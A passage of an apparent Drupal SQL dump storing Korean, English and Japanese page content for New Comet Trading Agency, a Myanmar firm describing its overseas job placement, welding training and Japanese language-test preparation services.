Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 161, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 161, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">当社は</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">年に設立し、登録</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"> ID (295/2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ー</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">2005)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">.&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">100</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">現在、ニュ</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">ー</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">コメットトレンディグエイジェンシ</span><span style=\"font-family:&quot;MS 